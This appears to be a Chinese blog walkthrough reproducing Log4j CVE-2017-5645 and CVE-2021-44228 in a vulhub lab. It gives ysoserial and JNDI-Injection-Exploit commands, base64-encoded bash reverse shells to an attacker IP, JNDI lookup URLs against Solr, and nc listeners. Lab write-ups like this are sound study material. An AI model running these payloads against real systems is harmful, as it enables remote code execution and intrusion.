一.Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)
Apache Log4j是一個(gè)用于Java的日志記錄庫,其支持啟動(dòng)遠(yuǎn)程日志服務(wù)器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻擊者可利用該漏洞執(zhí)行任意代碼
環(huán)境:vulhub
工具下載地址:
ysoserial
利用工具生成payload:
#創(chuàng)建文件
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/test" | nc 192.168.85.128 4712
#反彈shell
#把 bash -i >& /dev/tcp/192.168.85.129/4466 0>&1進(jìn)行base64編碼
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44NS4xMjkvNDQ2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.85.128 4712
1.創(chuàng)建文件 進(jìn)入容器內(nèi)部,查看文件創(chuàng)建成功
docker ps
docker exec -it 19bdcb0184e1 /bin/bash
cd /tmp
ls
2.查看反彈的shell
有點(diǎn)問題沒反彈成功,應(yīng)該是這樣做的
nc -lvvp 4466
?二.Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)
Apache Log4j 2 是Java語言的日志處理套件,使用極為廣泛。在其2.0到2.14.1版本中存在一處JNDI注入漏洞,攻擊者在可以控制日志內(nèi)容的情況下,通過傳入類似于${jndi:ldap://evil.com/example}的lookup用于進(jìn)行JNDI注入,執(zhí)行任意代碼
環(huán)境:vulhub
工具下載地址:
JNDI-Injection-Exploit
1.利用dnslog平臺(tái)檢測是否有漏洞
后面換成dnslong平臺(tái)的域名
http://192.168.85.128:8983/solr/admin/cores?action=${jndi:ldap://yahs0y.dnslog.cn}
2.利用工具反彈shell
(1)使用工具生成payload
1.把bash -i >& /dev/tcp/192.168.85.129/4444 0>&1進(jìn)行base64編碼 填入echo后,-A參數(shù)后填入攻擊機(jī)的ip
2.利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg1LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.85.129
(2)選用一個(gè)作為url action后的payload,訪問此url這里選用第一個(gè),下面的url訪問
http://192.168.85.128:8983/solr/admin/cores?action=${jndi:rmi://192.168.85.129:1099/itx5mr}
(3)攻擊機(jī)開啟監(jiān)聽
nc -lvvp 4444
文章來源:http://www.zghlxwxcb.cn/news/detail-667027.html
參考文章:
CVE-2021-44228文章來源地址http://www.zghlxwxcb.cn/news/detail-667027.html
到了這里,關(guān)于Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!